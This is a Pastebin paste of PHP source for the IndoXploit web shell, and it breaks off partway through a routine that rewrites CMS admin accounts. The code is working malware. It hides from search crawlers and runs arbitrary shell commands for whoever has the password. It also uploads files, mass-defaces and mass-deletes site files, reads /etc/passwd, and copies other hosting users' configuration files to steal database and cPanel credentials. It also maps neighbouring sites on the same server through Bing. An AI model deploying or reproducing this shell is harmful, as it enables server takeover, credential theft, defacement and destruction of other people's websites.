raden010

shell

Sep 5th, 2017
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 97.97 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "ac804e0b3b807b0d4b093eee76e07f85"; // default: borix
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>IndoXploit</title>
  31. <style type="text/css">
  32. html {
  33. margin: 20px auto;
  34. background: #000000;
  35. color: green;
  36. text-align: center;
  37. }
  38. header {
  39. color: green;
  40. margin: 10px auto;
  41. }
  42. input[type=password] {
  43. width: 250px;
  44. height: 25px;
  45. color: red;
  46. background: #000000;
  47. border: 1px dotted green;
  48. padding: 5px;
  49. margin-left: 20px;
  50. text-align: center;
  51. }
  52. </style>
  53. </head>
  54. <center>
  55. <header>
  56. <pre>
  57. ___________________________
  58. < root@indoxploit:~# w00t??? >
  59. ---------------------------
  60. \ , ,
  61. \ /( )`
  62. \ \ \___ / |
  63. /- _ `-/ '
  64. (/\/ \ \ /\
  65. / / | ` \
  66. O O ) / |
  67. `-^--'`< '
  68. (_.) _ ) /
  69. `.___/` /
  70. `-----' /
  71. <----. __ / __ \
  72. <----|====O)))==) \) /====
  73. <----' `--' `.__,' \
  74. | |
  75. \ /
  76. ______( (_ / \______
  77. ,' ,-----' | \
  78. `--{__________) \/
  79.  
  80. </pre>
  81. </header>
  82. <form method="post">
  83. <input type="password" name="pass">
  84. </form>
  85. <?php
  86. exit;
  87. }
  88. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  89. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  90. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  91. else
  92. login_shell();
  93. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  94. @ob_clean();
  95. $file = $_GET['file'];
  96. header('Content-Description: File Transfer');
  97. header('Content-Type: application/octet-stream');
  98. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  99. header('Expires: 0');
  100. header('Cache-Control: must-revalidate');
  101. header('Pragma: public');
  102. header('Content-Length: ' . filesize($file));
  103. readfile($file);
  104. exit;
  105. }
  106. ?>
  107. <html>
  108. <head>
  109. <title>IndoXploit</title>
  110. <meta name='author' content='IndoXploit'>
  111. <meta charset="UTF-8">
  112. <style type='text/css'>
  113. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  114. html {
  115. background: #000000;
  116. color: #ffffff;
  117. font-family: 'Ubuntu';
  118. font-size: 13px;
  119. width: 100%;
  120. }
  121. li {
  122. display: inline;
  123. margin: 5px;
  124. padding: 5px;
  125. }
  126. table, th, td {
  127. border-collapse:collapse;
  128. font-family: Tahoma, Geneva, sans-serif;
  129. background: transparent;
  130. font-family: 'Ubuntu';
  131. font-size: 13px;
  132. }
  133. .table_home, .th_home, .td_home {
  134. border: 1px solid #ffffff;
  135. }
  136. th {
  137. padding: 10px;
  138. }
  139. a {
  140. color: #ffffff;
  141. text-decoration: none;
  142. }
  143. a:hover {
  144. color: gold;
  145. text-decoration: underline;
  146. }
  147. b {
  148. color: gold;
  149. }
  150. input[type=text], input[type=password],input[type=submit] {
  151. background: transparent;
  152. color: #ffffff;
  153. border: 1px solid #ffffff;
  154. margin: 5px auto;
  155. padding-left: 5px;
  156. font-family: 'Ubuntu';
  157. font-size: 13px;
  158. }
  159. textarea {
  160. border: 1px solid #ffffff;
  161. width: 100%;
  162. height: 400px;
  163. padding-left: 5px;
  164. margin: 10px auto;
  165. resize: none;
  166. background: transparent;
  167. color: #ffffff;
  168. font-family: 'Ubuntu';
  169. font-size: 13px;
  170. }
  171. select {
  172. width: 152px;
  173. background: #000000;
  174. color: lime;
  175. border: 1px solid #ffffff;
  176. margin: 5px auto;
  177. padding-left: 5px;
  178. font-family: 'Ubuntu';
  179. font-size: 13px;
  180. }
  181. option:hover {
  182. background: lime;
  183. color: #000000;
  184. }
  185. </style>
  186. </head>
  187. <?php
  188. ###############################################################################
  189. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  190. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  191. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  192. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  193. // Greetz: All Member IndoXploit. & all my friends.
  194. ###############################################################################
  195. function w($dir,$perm) {
  196. if(!is_writable($dir)) {
  197. return "<font color=red>".$perm."</font>";
  198. } else {
  199. return "<font color=lime>".$perm."</font>";
  200. }
  201. }
  202. function r($dir,$perm) {
  203. if(!is_readable($dir)) {
  204. return "<font color=red>".$perm."</font>";
  205. } else {
  206. return "<font color=lime>".$perm."</font>";
  207. }
  208. }
  209. function exe($cmd) {
  210. if(function_exists('system')) {
  211. @ob_start();
  212. @system($cmd);
  213. $buff = @ob_get_contents();
  214. @ob_end_clean();
  215. return $buff;
  216. } elseif(function_exists('exec')) {
  217. @exec($cmd,$results);
  218. $buff = "";
  219. foreach($results as $result) {
  220. $buff .= $result;
  221. } return $buff;
  222. } elseif(function_exists('passthru')) {
  223. @ob_start();
  224. @passthru($cmd);
  225. $buff = @ob_get_contents();
  226. @ob_end_clean();
  227. return $buff;
  228. } elseif(function_exists('shell_exec')) {
  229. $buff = @shell_exec($cmd);
  230. return $buff;
  231. }
  232. }
  233. function perms($file){
  234. $perms = fileperms($file);
  235. if (($perms & 0xC000) == 0xC000) {
  236. // Socket
  237. $info = 's';
  238. } elseif (($perms & 0xA000) == 0xA000) {
  239. // Symbolic Link
  240. $info = 'l';
  241. } elseif (($perms & 0x8000) == 0x8000) {
  242. // Regular
  243. $info = '-';
  244. } elseif (($perms & 0x6000) == 0x6000) {
  245. // Block special
  246. $info = 'b';
  247. } elseif (($perms & 0x4000) == 0x4000) {
  248. // Directory
  249. $info = 'd';
  250. } elseif (($perms & 0x2000) == 0x2000) {
  251. // Character special
  252. $info = 'c';
  253. } elseif (($perms & 0x1000) == 0x1000) {
  254. // FIFO pipe
  255. $info = 'p';
  256. } else {
  257. // Unknown
  258. $info = 'u';
  259. }
  260. // Owner
  261. $info .= (($perms & 0x0100) ? 'r' : '-');
  262. $info .= (($perms & 0x0080) ? 'w' : '-');
  263. $info .= (($perms & 0x0040) ?
  264. (($perms & 0x0800) ? 's' : 'x' ) :
  265. (($perms & 0x0800) ? 'S' : '-'));
  266. // Group
  267. $info .= (($perms & 0x0020) ? 'r' : '-');
  268. $info .= (($perms & 0x0010) ? 'w' : '-');
  269. $info .= (($perms & 0x0008) ?
  270. (($perms & 0x0400) ? 's' : 'x' ) :
  271. (($perms & 0x0400) ? 'S' : '-'));
  272. // World
  273. $info .= (($perms & 0x0004) ? 'r' : '-');
  274. $info .= (($perms & 0x0002) ? 'w' : '-');
  275. $info .= (($perms & 0x0001) ?
  276. (($perms & 0x0200) ? 't' : 'x' ) :
  277. (($perms & 0x0200) ? 'T' : '-'));
  278. return $info;
  279. }
  280. function hdd($s) {
  281. if($s >= 1073741824)
  282. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  283. elseif($s >= 1048576)
  284. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  285. elseif($s >= 1024)
  286. return sprintf('%1.2f',$s / 1024 ) .' KB';
  287. else
  288. return $s .' B';
  289. }
  290. function ambilKata($param, $kata1, $kata2){
  291. if(strpos($param, $kata1) === FALSE) return FALSE;
  292. if(strpos($param, $kata2) === FALSE) return FALSE;
  293. $start = strpos($param, $kata1) + strlen($kata1);
  294. $end = strpos($param, $kata2, $start);
  295. $return = substr($param, $start, $end - $start);
  296. return $return;
  297. }
  298. function getsource($url) {
  299. $curl = curl_init($url);
  300. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  301. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  302. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  303. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  304. $content = curl_exec($curl);
  305. curl_close($curl);
  306. return $content;
  307. }
  308. function bing($dork) {
  309. $npage = 1;
  310. $npages = 30000;
  311. $allLinks = array();
  312. $lll = array();
  313. while($npage <= $npages) {
  314. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  315. if($x) {
  316. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  317. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  318. $npage = $npage + 10;
  319. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  320. } else break;
  321. }
  322. $URLs = array();
  323. foreach($allLinks as $url){
  324. $exp = explode("/", $url);
  325. $URLs[] = $exp[2];
  326. }
  327. $array = array_filter($URLs);
  328. $array = array_unique($array);
  329. $sss = count(array_unique($array));
  330. foreach($array as $domain) {
  331. echo $domain."\n";
  332. }
  333. }
  334. function reverse($url) {
  335. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  336. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  337. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  338. curl_setopt($ch, CURLOPT_HEADER, 0);
  339. curl_setopt($ch, CURLOPT_POST, 1);
  340. $resp = curl_exec($ch);
  341. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  342. $array = explode(",,", $resp);
  343. unset($array[0]);
  344. foreach($array as $lnk) {
  345. $lnk = "http://$lnk";
  346. $lnk = str_replace(",", "", $lnk);
  347. echo $lnk."\n";
  348. ob_flush();
  349. flush();
  350. }
  351. curl_close($ch);
  352. }
  353. if(get_magic_quotes_gpc()) {
  354. function idx_ss($array) {
  355. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  356. }
  357. $_POST = idx_ss($_POST);
  358. $_COOKIE = idx_ss($_COOKIE);
  359. }
  360.  
  361. if(isset($_GET['dir'])) {
  362. $dir = $_GET['dir'];
  363. chdir($dir);
  364. } else {
  365. $dir = getcwd();
  366. }
  367. $kernel = php_uname();
  368. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  369. $dir = str_replace("\\","/",$dir);
  370. $scdir = explode("/", $dir);
  371. $freespace = hdd(disk_free_space("/"));
  372. $total = hdd(disk_total_space("/"));
  373. $used = $total - $freespace;
  374. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  375. $ds = @ini_get("disable_functions");
  376. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  377. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  378. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  379. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  380. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  381. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  382. if(!function_exists('posix_getegid')) {
  383. $user = @get_current_user();
  384. $uid = @getmyuid();
  385. $gid = @getmygid();
  386. $group = "?";
  387. } else {
  388. $uid = @posix_getpwuid(posix_geteuid());
  389. $gid = @posix_getgrgid(posix_getegid());
  390. $user = $uid['name'];
  391. $uid = $uid['uid'];
  392. $group = $gid['name'];
  393. $gid = $gid['gid'];
  394. }
  395. echo "System: <font color=lime>".$kernel."</font><br>";
  396. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  397. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  398. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  399. echo "Safe Mode: $sm<br>";
  400. echo "Disable Functions: $show_ds<br>";
  401. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  402. echo "Current DIR: ";
  403. foreach($scdir as $c_dir => $cdir) {
  404. echo "<a href='?dir=";
  405. for($i = 0; $i <= $c_dir; $i++) {
  406. echo $scdir[$i];
  407. if($i != $c_dir) {
  408. echo "/";
  409. }
  410. }
  411. echo "'>$cdir</a>/";
  412. }
  413. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  414. echo "<hr>";
  415. echo "<center>";
  416. echo "<ul>";
  417. echo "<li>[ <a href='?'>Home</a> ]</li>";
  418. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  419. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  420. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  421. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  422. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  423. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  424. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  425. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  426. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  427. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  428. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
  429. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
  430. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  431. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  432. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  433. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  434. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  435. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  436. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  437. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
  438. echo "</ul>";
  439. echo "</center>";
  440. echo "<hr>";
  441. if($_GET['logout'] == true) {
  442. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  443. echo "<script>window.location='?';</script>";
  444. } elseif($_GET['do'] == 'upload') {
  445. echo "<center>";
  446. if($_POST['upload']) {
  447. if($_POST['tipe_upload'] == 'biasa') {
  448. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  449. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  450. } else {
  451. $act = "<font color=red>failed to upload file</font>";
  452. }
  453. } else {
  454. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  455. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  456. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  457. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  458. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  459. } else {
  460. $act = "<font color=red>failed to upload file</font>";
  461. }
  462. } else {
  463. $act = "<font color=red>failed to upload file</font>";
  464. }
  465. }
  466. }
  467. echo "Upload File:
  468. <form method='post' enctype='multipart/form-data'>
  469. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  470. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  471. <input type='file' name='ix_file'>
  472. <input type='submit' value='upload' name='upload'>
  473. </form>";
  474. echo $act;
  475. echo "</center>";
  476. } elseif($_GET['do'] == 'cmd') {
  477. echo "<form method='post'>
  478. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  479. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  480. </form>";
  481. if($_POST['do_cmd']) {
  482. echo "<pre>".exe($_POST['cmd'])."</pre>";
  483. }
  484. } elseif($_GET['do'] == 'mass_deface') {
  485. function sabun_massal($dir,$namafile,$isi_script) {
  486. if(is_writable($dir)) {
  487. $dira = scandir($dir);
  488. foreach($dira as $dirb) {
  489. $dirc = "$dir/$dirb";
  490. $lokasi = $dirc.'/'.$namafile;
  491. if($dirb === '.') {
  492. file_put_contents($lokasi, $isi_script);
  493. } elseif($dirb === '..') {
  494. file_put_contents($lokasi, $isi_script);
  495. } else {
  496. if(is_dir($dirc)) {
  497. if(is_writable($dirc)) {
  498. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  499. file_put_contents($lokasi, $isi_script);
  500. $idx = sabun_massal($dirc,$namafile,$isi_script);
  501. }
  502. }
  503. }
  504. }
  505. }
  506. }
  507. function sabun_biasa($dir,$namafile,$isi_script) {
  508. if(is_writable($dir)) {
  509. $dira = scandir($dir);
  510. foreach($dira as $dirb) {
  511. $dirc = "$dir/$dirb";
  512. $lokasi = $dirc.'/'.$namafile;
  513. if($dirb === '.') {
  514. file_put_contents($lokasi, $isi_script);
  515. } elseif($dirb === '..') {
  516. file_put_contents($lokasi, $isi_script);
  517. } else {
  518. if(is_dir($dirc)) {
  519. if(is_writable($dirc)) {
  520. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  521. file_put_contents($lokasi, $isi_script);
  522. }
  523. }
  524. }
  525. }
  526. }
  527. }
  528. if($_POST['start']) {
  529. if($_POST['tipe_sabun'] == 'mahal') {
  530. echo "<div style='margin: 5px auto; padding: 5px'>";
  531. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  532. echo "</div>";
  533. } elseif($_POST['tipe_sabun'] == 'murah') {
  534. echo "<div style='margin: 5px auto; padding: 5px'>";
  535. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  536. echo "</div>";
  537. }
  538. } else {
  539. echo "<center>";
  540. echo "<form method='post'>
  541. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  542. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  543. <font style='text-decoration: underline;'>Folder:</font><br>
  544. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  545. <font style='text-decoration: underline;'>Filename:</font><br>
  546. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  547. <font style='text-decoration: underline;'>Index File:</font><br>
  548. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  549. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  550. </form></center>";
  551. }
  552. } elseif($_GET['do'] == 'mass_delete') {
  553. function hapus_massal($dir,$namafile) {
  554. if(is_writable($dir)) {
  555. $dira = scandir($dir);
  556. foreach($dira as $dirb) {
  557. $dirc = "$dir/$dirb";
  558. $lokasi = $dirc.'/'.$namafile;
  559. if($dirb === '.') {
  560. if(file_exists("$dir/$namafile")) {
  561. unlink("$dir/$namafile");
  562. }
  563. } elseif($dirb === '..') {
  564. if(file_exists("".dirname($dir)."/$namafile")) {
  565. unlink("".dirname($dir)."/$namafile");
  566. }
  567. } else {
  568. if(is_dir($dirc)) {
  569. if(is_writable($dirc)) {
  570. if(file_exists($lokasi)) {
  571. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  572. unlink($lokasi);
  573. $idx = hapus_massal($dirc,$namafile);
  574. }
  575. }
  576. }
  577. }
  578. }
  579. }
  580. }
  581. if($_POST['start']) {
  582. echo "<div style='margin: 5px auto; padding: 5px'>";
  583. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  584. echo "</div>";
  585. } else {
  586. echo "<center>";
  587. echo "<form method='post'>
  588. <font style='text-decoration: underline;'>Folder:</font><br>
  589. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  590. <font style='text-decoration: underline;'>Filename:</font><br>
  591. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  592. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  593. </form></center>";
  594. }
  595. } elseif($_GET['do'] == 'config') {
  596. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  597. $idx = mkdir("idx_config", 0777);
  598. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  599. $htc = fopen("idx_config/.htaccess","w");
  600. fwrite($htc, $isi_htc);
  601. while($passwd = fgets($etc)) {
  602. if($passwd == "" || !$etc) {
  603. echo "<font color=red>Can't read /etc/passwd</font>";
  604. } else {
  605. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  606. foreach($user_config[1] as $user_idx) {
  607. $user_config_dir = "/home/$user_idx/public_html/";
  608. if(is_readable($user_config_dir)) {
  609. $grab_config = array(
  610. "/home/$user_idx/.my.cnf" => "cpanel",
  611. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  612. "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
  613. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  614. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  615. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  616. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  617. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  618. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  619. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  620. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  621. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  622. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  623. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  624. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  625. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  626. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  627. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  628. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  629. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  630. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  631. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  632. foreach($grab_config as $config => $nama_config) {
  633. $ambil_config = file_get_contents($config);
  634. if($ambil_config == '') {
  635. } else {
  636. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  637. fputs($file_config,$ambil_config);
  638. }
  639. }
  640. }
  641. }
  642. }
  643. }
  644. echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  645. } elseif($_GET['do'] == 'jumping') {
  646. $i = 0;
  647. echo "<div class='margin: 5px auto;'>";
  648. if(preg_match("/hsphere/", $dir)) {
  649. $urls = explode("\r\n", $_POST['url']);
  650. if(isset($_POST['jump'])) {
  651. echo "<pre>";
  652. foreach($urls as $url) {
  653. $url = str_replace(array("http://","www."), "", strtolower($url));
  654. $etc = "/etc/passwd";
  655. $f = fopen($etc,"r");
  656. while($gets = fgets($f)) {
  657. $pecah = explode(":", $gets);
  658. $user = $pecah[0];
  659. $dir_user = "/hsphere/local/home/$user";
  660. if(is_dir($dir_user) === true) {
  661. $url_user = $dir_user."/".$url;
  662. if(is_readable($url_user)) {
  663. $i++;
  664. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  665. if(is_writable($url_user)) {
  666. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  667. }
  668. echo $jrw."<br>";
  669. }
  670. }
  671. }
  672. }
  673. if($i == 0) {
  674. } else {
  675. echo "<br>Total ada ".$i." Kamar di ".$ip;
  676. }
  677. echo "</pre>";
  678. } else {
  679. echo '<center>
  680. <form method="post">
  681. List Domains: <br>
  682. <textarea name="url" style="width: 500px; height: 250px;">';
  683. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  684. while($getss = fgets($fp)) {
  685. echo $getss;
  686. }
  687. echo '</textarea><br>
  688. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  689. </form></center>';
  690. }
  691. } elseif(preg_match("/vhosts/", $dir)) {
  692. $urls = explode("\r\n", $_POST['url']);
  693. if(isset($_POST['jump'])) {
  694. echo "<pre>";
  695. foreach($urls as $url) {
  696. $web_vh = "/var/www/vhosts/$url/httpdocs";
  697. if(is_dir($web_vh) === true) {
  698. if(is_readable($web_vh)) {
  699. $i++;
  700. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  701. if(is_writable($web_vh)) {
  702. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  703. }
  704. echo $jrw."<br>";
  705. }
  706. }
  707. }
  708. if($i == 0) {
  709. } else {
  710. echo "<br>Total ada ".$i." Kamar di ".$ip;
  711. }
  712. echo "</pre>";
  713. } else {
  714. echo '<center>
  715. <form method="post">
  716. List Domains: <br>
  717. <textarea name="url" style="width: 500px; height: 250px;">';
  718. bing("ip:$ip");
  719. echo '</textarea><br>
  720. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  721. </form></center>';
  722. }
  723. } else {
  724. echo "<pre>";
  725. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  726. while($passwd = fgets($etc)) {
  727. if($passwd == '' || !$etc) {
  728. echo "<font color=red>Can't read /etc/passwd</font>";
  729. } else {
  730. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  731. foreach($user_jumping[1] as $user_idx_jump) {
  732. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  733. if(is_readable($user_jumping_dir)) {
  734. $i++;
  735. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  736. if(is_writable($user_jumping_dir)) {
  737. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  738. }
  739. echo $jrw;
  740. if(function_exists('posix_getpwuid')) {
  741. $domain_jump = file_get_contents("/etc/named.conf");
  742. if($domain_jump == '') {
  743. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  744. } else {
  745. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  746. foreach($domains_jump[1] as $dj) {
  747. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  748. $user_jumping_url = $user_jumping_url['name'];
  749. if($user_jumping_url == $user_idx_jump) {
  750. echo " => ( <u>$dj</u> )<br>";
  751. break;
  752. }
  753. }
  754. }
  755. } else {
  756. echo "<br>";
  757. }
  758. }
  759. }
  760. }
  761. }
  762. if($i == 0) {
  763. } else {
  764. echo "<br>Total ada ".$i." Kamar di ".$ip;
  765. }
  766. echo "</pre>";
  767. }
  768. echo "</div>";
  769. } elseif($_GET['do'] == 'auto_edit_user') {
  770. if($_POST['hajar']) {
  771. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  772. echo "username atau password harus lebih dari 6 karakter";
  773. } else {
  774. $user_baru = $_POST['user_baru'];
  775. $pass_baru = md5($_POST['pass_baru']);
  776. $conf = $_POST['config_dir'];
  777. $scan_conf = scandir($conf);
  778. foreach($scan_conf as $file_conf) {
  779. if(!is_file("$conf/$file_conf")) continue;
  780. $config = file_get_contents("$conf/$file_conf");
  781. if(preg_match("/JConfig|joomla/",$config)) {
  782. $dbhost = ambilkata($config,"host = '","'");
  783. $dbuser = ambilkata($config,"user = '","'");
  784. $dbpass = ambilkata($config,"password = '","'");
  785. $dbname = ambilkata($config,"db = '","'");
  786. $dbprefix = ambilkata($config,"dbprefix = '","'");
  787. $prefix = $dbprefix."users";
  788. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  789. $db = mysql_select_db($dbname);
  790. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  791. $result = mysql_fetch_array($q);
  792. $id = $result['id'];
